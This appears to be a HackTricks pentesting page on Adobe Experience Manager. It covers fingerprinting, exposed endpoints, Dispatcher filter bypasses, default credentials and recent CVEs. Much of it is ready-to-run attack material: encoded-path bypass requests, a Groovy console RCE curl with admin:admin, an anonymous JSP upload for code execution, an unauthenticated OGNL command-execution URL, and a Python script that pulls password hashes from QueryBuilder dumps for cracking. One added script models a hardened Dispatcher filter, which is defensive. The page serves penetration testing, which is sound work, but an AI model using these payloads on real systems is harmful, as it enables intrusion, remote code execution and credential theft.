AEM (Adobe Experience Manager) Pentesting
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on Apache Sling/Felix (OSGi) on top of a Java Content Repository (JCR). From an attacker's perspective, AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long list of CVEs that get patched every quarter.
The checklist below focuses on the externally reachable (unauthenticated) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
Other quick indicators:
- /etc.clientlibs/ static path present (serves JS/CSS).
- /libs/granite/core/content/login.html login page with the “Adobe Experience Manager” banner.
- </script><!--/* CQ */--> comment at the bottom of the HTML.
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
| /.json, /.1.json | JCR nodes via DefaultGetServlet | Often blocked, but the Dispatcher bypass (see below) works. |
| /bin/querybuilder.json?path=/ | QueryBuilder API | Leaks the page tree, internal paths and usernames. |
| /system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 by default; if exposed and creds are found ⇒ bundle-upload RCE. |
| /crx/packmgr/index.jsp | Package Manager | Lets authenticated users upload content packages → JSP payload upload. |
| /etc/groovyconsole/** | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. |
| /libs/cq/AuditlogSearchServlet.json | Audit logs | Information leak. |
| /libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
| /adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installations (CVE-2025-54253) this endpoint evaluates unauthenticated OGNL → RCE. |
Dispatcher bypass tricks (still working in 2025/2026)
Most production sites sit behind the Dispatcher (reverse proxy). Its filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
Classic semicolon + allowed extension
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
Encoded slash bypass (2025 KB ka-27832)
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
If the Dispatcher accepts encoded slashes, it returns JSON even though /bin is supposed to be denied.
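To see why both requests slip through, here is an added example in Python (not from this page, from aem-hacker, or from Adobe) that models a Dispatcher-style filter: a naive version that decides on the raw URL's last extension and matches path globs line by line, beside a hardened version that first normalises the request to the resource path Sling will actually resolve and then applies the same rules. The rule set, the glob semantics and the Sling path approximation are assumptions made for the demonstration, not the Dispatcher's real implementation.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed rule set for this demonstration (an assumption, not a real
# dispatcher.any): deny everything, allow a handful of extensions, then deny
# sensitive path prefixes. As in the Dispatcher, the LAST matching rule wins.
ALLOWED_EXTENSIONS = {"css", "js", "png", "jpg", "gif", "ico", "woff2", "html", "json"}
DENIED_PREFIXES = ("/bin/", "/system/", "/crx/", "/etc/")


def naive_filter(raw_url: str) -> str:
    """Filter with two classic mistakes: the extension is whatever follows the
    last dot, and '/bin/*' is matched with a line-oriented '*' that cannot cross
    the newline that %0a decodes to. Nothing collapses the leading '//' that
    %2f produces either."""
    path = unquote(raw_url.split("?", 1)[0])
    decision = "deny"                                      # /0001 deny *
    ext = path.rsplit(".", 1)[-1] if "." in path else ""
    if ext in ALLOWED_EXTENSIONS:                          # /0002 allow by extension
        decision = "allow"
    for prefix in DENIED_PREFIXES:                         # /0003 deny /bin/* etc.
        if re.match(re.escape(prefix) + r"[^\n]*$", path):
            decision = "deny"
    return decision


def sling_resource_path(raw_url: str) -> tuple:
    """Approximation of what Sling will resolve (Sling's real resolver walks the
    repository; this is an assumption good enough for the filter): percent-decode,
    drop ';...' path parameters, collapse repeated slashes, resolve dot segments,
    then split the last segment at its first dot into resource path and
    selector/extension chain."""
    path = unquote(raw_url.split("?", 1)[0])
    path = re.sub(r";[^/]*", "", path)        # /a.json;\nb.css  -> /a.json
    path = re.sub(r"/+", "/", path)           # //bin/x          -> /bin/x
    path = posixpath.normpath(path)           # /content/../bin  -> /bin
    head, _, last = path.rpartition("/")
    resource, _, chain = last.partition(".")
    return head + "/" + resource, chain


def hardened_filter(raw_url: str) -> str:
    """Same rule set, applied to the normalised resource path instead of the raw
    URL, with control characters rejected outright and .json confined to /content."""
    decoded = unquote(raw_url.split("?", 1)[0])
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return "deny"                                      # %0a, %0d, %00 are never legitimate
    resource, chain = sling_resource_path(raw_url)
    if resource.startswith(DENIED_PREFIXES):
        return "deny"                                      # /bin/querybuilder however it is spelled
    ext = chain.split(".")[-1] if chain else ""
    if ext == "json" and not resource.startswith("/content/"):
        return "deny"                                      # no DefaultGetServlet dumps outside /content
    return "allow" if ext in ALLOWED_EXTENSIONS else "deny"


if __name__ == "__main__":
    for url in ("/bin/querybuilder.json?path=/",
                "/bin/querybuilder.json;%0aa.css?path=/home&type=rep:User",
                "/%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType",
                "/.json",
                "/content/site/en.json",
                "/etc.clientlibs/clientlibs/granite/jquery.css"):
        print(f"{url:<72} naive={naive_filter(url):<5} hardened={hardened_filter(url)}")
```

Running the script shows the naive filter allowing both bypass variants (and the root /.json dump) while denying the plain /bin request, and the hardened filter denying all four. The lesson is the one the page makes: a filter must decide on the decoded, normalised resource path and the full selector/extension chain, never on the raw URL.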
3. Common misconfigurations (still live in 2026)
- Anonymous POST servlet – POST /.json with :operation=import lets you plant new JCR nodes. Blocking POST to *.json in the Dispatcher fixes this.
- World-readable user profiles – the default ACL grants jcr:read on /home/users/**/profile/* to everyone.
- Default credentials – admin:admin, author:author, replication:replication.
- WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installations).
- Groovy Console exposed – remote code execution by submitting a Groovy script:
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
- Dispatcher encoded-slash gap – /bin/querybuilder.json and /etc/truststore.json reachable via %2f / %3B even when path filters block them.
- AEM Forms Struts devMode left enabled – /adminui/debug?expression= evaluates OGNL without auth (CVE-2025-54253), giving unauthenticated RCE; the companion XXE in Forms submissions (CVE-2025-54254) allows file read.
4. Recent vulnerabilities (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |
Always check the APSB bulletin that matches the client's service pack and push for the latest 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE needs its own add-on hotfix 6.5.0-0108+.
5. Exploitation snippets
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded
:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
Now request /content/evil.jsp – the JSP executes as the AEM process user.
5.2 SSRF to RCE (historical, < 6.3)
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
aem_ssrf2rce.py from aem-hacker automates the full chain.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
If the target is vulnerable, the HTTP body contains the output of the command.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
Returns user nodes, rep:password hashes included, when the anonymous read ACLs are left at their defaults.
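To turn a dumped user tree into something you can act on, here is an added example in Python (not from this page or from aem-hacker) that parses a QueryBuilder p.hits=full response, walks the nested nodes, and pulls out every rep:User whose rep:password was readable, splitting Oak's {algorithm}salt-iterations-hash format into its parts. The response body is constructed for the example with made-up hash values; the Oak hash layout, the rep:disabled property and the nested-child shape of p.nodedepth output are the real ones, but assume them rather than take them as captured data.

```python
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Oak stores passwords as {algorithm}salt-iterations-hash; salt and iterations
# are optional in old or imported hashes, so the regex accepts all three shapes.
OAK_HASH = re.compile(
    r"^\{(?P<alg>[^}]+)\}(?:(?P<salt>[0-9a-fA-F]+)-)?(?:(?P<iter>\d+)-)?(?P<hash>[0-9a-fA-F]+)$"
)


@dataclass
class LeakedCredential:
    path: str
    user_id: str
    algorithm: str
    salt: Optional[str]
    iterations: int
    digest: str
    disabled: Optional[str]   # value of rep:disabled (a reason string), None if the account is active


def parse_oak_hash(value: str):
    """Split an Oak password hash into (algorithm, salt, iterations, digest);
    returns None if the value is not in Oak's format. No iterations field means
    a single round, which Oak encodes by omitting the number."""
    m = OAK_HASH.match(value)
    if not m:
        return None
    return m["alg"], m["salt"], int(m["iter"]) if m["iter"] else 1, m["hash"]


def walk(node: dict, path: Optional[str] = None):
    """Yield (path, node) for a hit and every nested child node. With
    p.hits=full and p.nodedepth>0 QueryBuilder inlines children as nested
    objects keyed by node name, so every dict-valued property is a child."""
    path = path or node.get("jcr:path", "")
    yield path, node
    for name, child in node.items():
        if isinstance(child, dict):
            yield from walk(child, f"{path}/{name}")


def find_leaked_hashes(response_body: str) -> List[LeakedCredential]:
    """Return every rep:User in a QueryBuilder JSON response whose rep:password
    property was readable by the requesting (here: anonymous) session."""
    found = []
    for hit in json.loads(response_body).get("hits", []):
        for path, node in walk(hit):
            if node.get("jcr:primaryType") != "rep:User" or "rep:password" not in node:
                continue
            parsed = parse_oak_hash(node["rep:password"])
            if parsed is None:
                continue
            alg, salt, iters, digest = parsed
            found.append(LeakedCredential(
                path=path,
                user_id=node.get("rep:authorizableId") or node.get("rep:principalName", "?"),
                algorithm=alg, salt=salt, iterations=iters, digest=digest,
                disabled=node.get("rep:disabled"),
            ))
    return found


# Constructed response (made-up hashes, not captured from a real host) in the
# shape QueryBuilder returns for ?path=/home&type=rep:User&p.hits=full&p.nodedepth=2
SAMPLE_RESPONSE = json.dumps({
    "success": True, "results": 3, "total": 3, "more": False, "offset": 0,
    "hits": [
        {"jcr:path": "/home/users/a/admin", "jcr:primaryType": "rep:User",
         "rep:authorizableId": "admin", "rep:principalName": "admin",
         "rep:password": "{SHA-256}7b8c9d0e1f2a3b4c-1000-" + "a1" * 32,
         "profile": {"jcr:primaryType": "nt:unstructured", "email": "admin@example.invalid"}},
        {"jcr:path": "/home/users/r/replication-receiver", "jcr:primaryType": "rep:User",
         "rep:authorizableId": "replication-receiver", "rep:principalName": "replication-receiver",
         "rep:disabled": "inactive",
         "rep:password": "{SHA-256}0011223344556677-1000-" + "b2" * 32},
        {"jcr:path": "/home/users/system/workflow-service", "jcr:primaryType": "rep:SystemUser",
         "rep:authorizableId": "workflow-service"},   # system users carry no password
    ],
})

if __name__ == "__main__":
    for cred in find_leaked_hashes(SAMPLE_RESPONSE):
        state = "disabled" if cred.disabled else "active"
        print(f"{cred.user_id:<22} {cred.algorithm} iter={cred.iterations} "
              f"salt={cred.salt} {state}  {cred.path}")
```

Feed it the body of the GET above (`find_leaked_hashes(resp.text)`) to get a list of accounts worth cracking, with disabled accounts already flagged so you do not waste GPU time on them.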
6. Tooling
- aem-hacker – all-in-one enumeration script; supports dispatcher bypass, SSRF detection, default-creds checks and more.
python3 aem_hacker.py -u https://target --host attacker-ip
- Tenable WAS plugin 115065 – detects QueryBuilder hash disclosure & the encoded-slash bypass automatically (published Dec 2025).
- Content brute-force – recursively request /_jcr_content.(json|html) to discover hidden components.
- osgi-infect – uploads a malicious OSGi bundle via /system/console/bundles if creds are available.
References
- Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)